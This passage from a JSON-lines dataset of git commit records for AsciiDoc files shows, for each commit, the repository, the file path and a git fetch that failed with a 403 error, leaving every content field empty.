to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0d3dec2b1c113cfab425dacce38530c38baee872","subject":"y2b create post This Might Be The Coolest iPhone Case Ever...","message":"y2b create post This Might Be The Coolest iPhone Case Ever...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-12-This-Might-Be-The-Coolest-iPhone-Case-Ever.adoc","new_file":"_posts\/2017-07-12-This-Might-Be-The-Coolest-iPhone-Case-Ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97392be75242d7d28ea61e1961a0e5e7fcad5cb","subject":"Create etalab\/index.adoc","message":"Create etalab\/index.adoc","repos":"dtc-innovation\/research,dtc-innovation\/research","old_file":"etalab\/index.adoc","new_file":"etalab\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dtc-innovation\/research.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6660ab3c2e83445940d90131dc649ae95969312","subject":"Update 2015-08-23-Implementacion-de-una-pantalla-en-JSF-La-pantalla-de-Gestion-de-Trabajos.adoc","message":"Update 2015-08-23-Implementacion-de-una-pantalla-en-JSF-La-pantalla-de-Gestion-de-Trabajos.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-08-23-Implementacion-de-una-pantalla-en-JSF-La-pantalla-de-Gestion-de-Trabajos.adoc","new_file":"_posts\/2015-08-23-Implementacion-de-una-pantalla-en-JSF-La-pantalla-de-Gestion-de-Trabajos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef6b951dc6bfa78840ba3771ba0b2b17b61f3e13","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7124d7f368bc19950a3e68cc3f74315fd6fa42a4","subject":"Update 2018-06-24-Laravel56.adoc","message":"Update 2018-06-24-Laravel56.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel56.adoc","new_file":"_posts\/2018-06-24-Laravel56.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f79e47a91307fad666efd6974083dbc4c72a16f2","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2de2856c4b4acaa97671b156460f033cfde442ec","subject":"Create README.adoc","message":"Create README.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"images\/post3\/README.adoc","new_file":"images\/post3\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89fd37750182ff9e587a2fc95f1e1d000ad2f03b","subject":"Update 2015-03-11-jQuery-datepicker-Mit-pickadatejs-eine-responsive-Datumsauswahl-ermoglichen.adoc","message":"Update 2015-03-11-jQuery-datepicker-Mit-pickadatejs-eine-responsive-Datumsauswahl-ermoglichen.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-03-11-jQuery-datepicker-Mit-pickadatejs-eine-responsive-Datumsauswahl-ermoglichen.adoc","new_file":"_posts\/2015-03-11-jQuery-datepicker-Mit-pickadatejs-eine-responsive-Datumsauswahl-ermoglichen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"1a72fc549974ee40443c6c1934f0a78eb15e6f6a","subject":"Update 2013-06-17-The-PHP-maybe-function.adoc","message":"Update 2013-06-17-The-PHP-maybe-function.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-06-17-The-PHP-maybe-function.adoc","new_file":"_posts\/2013-06-17-The-PHP-maybe-function.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fac839854b001f55cd98dbaa712a2a7bdff4faf","subject":"y2b create post iPhone 6S vs Ford F150","message":"y2b create post iPhone 6S vs Ford F150","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-02-iPhone-6S-vs-Ford-F150.adoc","new_file":"_posts\/2015-10-02-iPhone-6S-vs-Ford-F150.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5319424b81c6677952c7c75160559fa5d47d6e14","subject":"Adding wip platform doc","message":"Adding wip platform doc\n","repos":"khartec\/waltz,kamransaleem\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,khartec\/waltz,khartec\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev,khartec\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev","old_file":"docs\/design\/draft\/platform\/platform-flows.adoc","new_file":"docs\/design\/draft\/platform\/platform-flows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f2fbd4544232132a2b982a4bea1e7b5bf4f2953","subject":"Minor further info","message":"Minor further info\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bce8a360c6ca6ef958fd3d353a739e17f54e613","subject":"Update 2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc","message":"Update 2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc","new_file":"_posts\/2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7743cdc7e79bf9ae92a102d788579c4233496d63","subject":"Readme file created","message":"Readme file created","repos":"EcoNum\/EN-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/EcoNum\/EN-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4940e139e3af8f7d7e9e8052de1a2ead2457fbb","subject":"Use man page as a README","message":"Use man page as a README\n","repos":"kamalmarhubi\/lsaddr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kamalmarhubi\/lsaddr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55c8ac2b13fbe4d645897115bcf0c7cc982a0f18","subject":"Create README.adoc","message":"Create README.adoc","repos":"bedrin\/kerb4j,bedrin\/kerb4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bedrin\/kerb4j.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"36a3f2abcb18d99c3ff0cca03e2833d23a6671a2","subject":"Create README.adoc","message":"Create README.adoc","repos":"reckart\/tt4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reckart\/tt4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"590b8377a2c2ae93e48d6a642d30202f1e68a513","subject":"Update technical-manual.adoc","message":"Update technical-manual.adoc","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"414b761f4ab85b050b397128224d27680b94a67f","subject":"Update README.adoc","message":"Update README.adoc\n\nFix document section order","repos":"gregory90\/react-popover,clara-labs\/react-popover,littlebits\/react-popover","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/littlebits\/react-popover.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8930dc7580c5591fa32ff18a04993f571bb7c5b0","subject":"Update README","message":"Update README\n","repos":"pjanouch\/razer-bw-te-ctl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/razer-bw-te-ctl.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"e9f30e8fe966e59f6e6875bc1cca63fccfd8ea0f","subject":"Create new README","message":"Create new README\n","repos":"mshogren\/bbqpi-server","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mshogren\/bbqpi-server.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8af44153784612a54f55c49630aac191bbe314ef","subject":"Add a README.","message":"Add a README.\n\nSigned-off-by: brian m. 
carlson <738bdd359be778fee9f0fc4e2934ad72f436ceda@crustytoothpaste.net>\n","repos":"bk2204\/extruder","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bk2204\/extruder.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c93aecc97237a4697449b6527697d6488f0e6e1","subject":"\ud83d\udcdd\u270f : initialize README","message":"\ud83d\udcdd\u270f : initialize README\n","repos":"benjamingarcia\/mifuchi","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/benjamingarcia\/mifuchi.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34a52166b096d80ad4e5d1008f18cc050592ba3e","subject":"add URLs, add software versions","message":"add URLs, add software versions\n","repos":"asciidoctor\/asciidoctor-fopub,azuwis\/asciidoctor-fopdf,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,azuwis\/asciidoctor-fopdf,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d150020de8a6753017fe3cd8f1113c57d281314","subject":"Create README.adoc","message":"Create README.adoc","repos":"pleft\/puck.js-thermometer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pleft\/puck.js-thermometer.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"115cd46a8e083a2ed7e781195c4ba04bc7566e4c","subject":"Added README","message":"Added README\n","repos":"Swagger2Markup\/swagger2markup-extensions","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Swagger2Markup\/swagger2markup-extensions.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85ad4ce14ce5bfbab553ee4b44af22777423d34c","subject":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ddba97f491c4889f684b9adf2171e1951e382b6","subject":"Update 2017-08-15-PiVPN.adoc","message":"Update 2017-08-15-PiVPN.adoc","repos":"pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io","old_file":"_posts\/2017-08-15-PiVPN.adoc","new_file":"_posts\/2017-08-15-PiVPN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/pamasse\/pamasse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e30da05b6a7dd375a235c27323501f1e0a14a5da","subject":"Update 2015-05-27-star_smarter.adoc","message":"Update 2015-05-27-star_smarter.adoc","repos":"diodario\/hubpress.io,diodario\/hubpress.io,diodario\/hubpress.io","old_file":"_posts\/2015-05-27-star_smarter.adoc","new_file":"_posts\/2015-05-27-star_smarter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diodario\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"568d3913a07bc48763fd9c9ab70f7940d5eb3614","subject":"Update 2016-04-19-B-L-A-N-K-05.adoc","message":"Update 2016-04-19-B-L-A-N-K-05.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-19-B-L-A-N-K-05.adoc","new_file":"_posts\/2016-04-19-B-L-A-N-K-05.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbff26f408db78c99cd7ba8863a6ef18956250e2","subject":"Add ingress controller document.","message":"Add ingress controller document.\n","repos":"dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,wombat\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"ingress-controllers\/readme.adoc","new_file":"ingress-controllers\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe24d52e27023698d63a33bcc2d09e1a556992c0","subject":"Update 2015-08-07-Conversation-in-Bluemix-with-IOTF.adoc","message":"Update 2015-08-07-Conversation-in-Bluemix-with-IOTF.adoc","repos":"jkamke\/jkamke.github.io,jkamke\/jkamke.github.io,jkamke\/jkamke.github.io","old_file":"_posts\/2015-08-07-Conversation-in-Bluemix-with-IOTF.adoc","new_file":"_posts\/2015-08-07-Conversation-in-Bluemix-with-IOTF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jkamke\/jkamke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5eafab5af81ad6acb6e409d5ba9d799b05a15bc","subject":"Update 2015-10-21-Bienvenue.adoc","message":"Update 2015-10-21-Bienvenue.adoc","repos":"itsmyr4bbit\/blog,itsmyr4bbit\/blog,itsmyr4bbit\/blog","old_file":"_posts\/2015-10-21-Bienvenue.adoc","new_file":"_posts\/2015-10-21-Bienvenue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsmyr4bbit\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1db339af0ce6e94efaa49af0e65417586ff692c9","subject":"Add manpage source","message":"Add manpage source\n","repos":"kamalmarhubi\/lsaddr","old_file":"lsip.adoc","new_file":"lsip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kamalmarhubi\/lsaddr.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e6aff72b068ad3e8c695db8f3e82bed411edb51","subject":"Add instructions to disable Cinder volume on nodes","message":"Add instructions to disable Cinder volume on nodes\n","repos":"markllama\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"135e4d8f96af257b88f9b094e962a003b16a5e98","subject":"refs #80","message":"refs #80\n","repos":"rmpestano\/cukedoctor,rmpestano\/cukedoctor,rmpestano\/cukedoctor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmpestano\/cukedoctor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d3729d9bacc8c747b3698083521c9846c2fc4d9","subject":"added gitter badge - not only the image","message":"added gitter badge\n- not only the image\n","repos":"ollin\/wstageorg,ollin\/wstageorg,ollin\/wstageorg","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ollin\/wstageorg.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"aab4dcdf55603374c3668295cf9718c9c9d12a1c","subject":"Fix badges","message":"Fix badges\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ed9a6d335cb8d1f70002641a710b05bd6d790ae","subject":"PLATSERV-184: Arreglada numeraci\u00f3n","message":"PLATSERV-184: Arreglada numeraci\u00f3n\n","repos":"serenity-devstack\/spring-cloud-services-connector","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/serenity-devstack\/spring-cloud-services-connector.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9c2a395d9cbc49ebbdf843e80d57504b213792c","subject":"Fix lies in README","message":"Fix lies in README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"7be7e790f774bae80fbf57d288926f773aef5d43","subject":"y2b create post Quick Review: Boxee Box by D-Link = DON'T BUY!","message":"y2b create post Quick Review: Boxee Box by D-Link = DON'T BUY!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-08-Quick-Review-Boxee-Box-by-DLink--DONT-BUY.adoc","new_file":"_posts\/2011-01-08-Quick-Review-Boxee-Box-by-DLink--DONT-BUY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac1ae4d8854886c7233982209002492e494ff7ed","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d976579646175de47e58373dffb260bd45cdc53","subject":"Update 2016-10-07-understanding-experience-in-everyday-life.adoc","message":"Update 2016-10-07-understanding-experience-in-everyday-life.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-07-understanding-experience-in-everyday-life.adoc","new_file":"_posts\/2016-10-07-understanding-experience-in-everyday-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d49a312fb2dc9faa9a7ce70cf4f9fff4ae5a1320","subject":"functional javascript","message":"functional javascript\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"javascript_functional.adoc","new_file":"javascript_functional.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"194d0e91f9f3dd4e044760a8c48c17d84a6a0afb","subject":"Update 2015-03-13-Hello-Guys.adoc","message":"Update 2015-03-13-Hello-Guys.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-03-13-Hello-Guys.adoc","new_file":"_posts\/2015-03-13-Hello-Guys.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56aa8a30aa78a4e945e91f63e5c60e3731861a88","subject":"y2b create post iPhone 6S Plus Bend Test","message":"y2b create post iPhone 6S Plus Bend Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-29-iPhone-6S-Plus-Bend-Test.adoc","new_file":"_posts\/2015-09-29-iPhone-6S-Plus-Bend-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38b54c70241efe824e5c36023c2df08540156e49","subject":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","message":"Update 
2017-02-10-eps-wroom-32-and-esp-idf.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40f9e99b572f99b55af02afa385bd510af49f177","subject":"Update 2013-04-19-Short-accoustic-performance.adoc","message":"Update 2013-04-19-Short-accoustic-performance.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-04-19-Short-accoustic-performance.adoc","new_file":"_posts\/2013-04-19-Short-accoustic-performance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"549df612a99171e91f0f8abeddd6c84b056f31ac","subject":"Update 2015-02-20-Respect-function-signatures.adoc","message":"Update 2015-02-20-Respect-function-signatures.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2015-02-20-Respect-function-signatures.adoc","new_file":"_posts\/2015-02-20-Respect-function-signatures.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05e57b40502b78fa9ea97437faa712914c29ccca","subject":"Update 2012-12-21-Un-mois-avec-IntelliJ-debut-de-lexperience.adoc","message":"Update 2012-12-21-Un-mois-avec-IntelliJ-debut-de-lexperience.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-12-21-Un-mois-avec-IntelliJ-debut-de-lexperience.adoc","new_file":"_posts\/2012-12-21-Un-mois-avec-IntelliJ-debut-de-lexperience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2aac8449f599af2c659101ffeb23d896b061d721","subject":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","message":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"381e8e121df44e1e168dab2d2c3eb2c21a290ae6","subject":"Update 2015-06-08-A-remplacer.adoc","message":"Update 
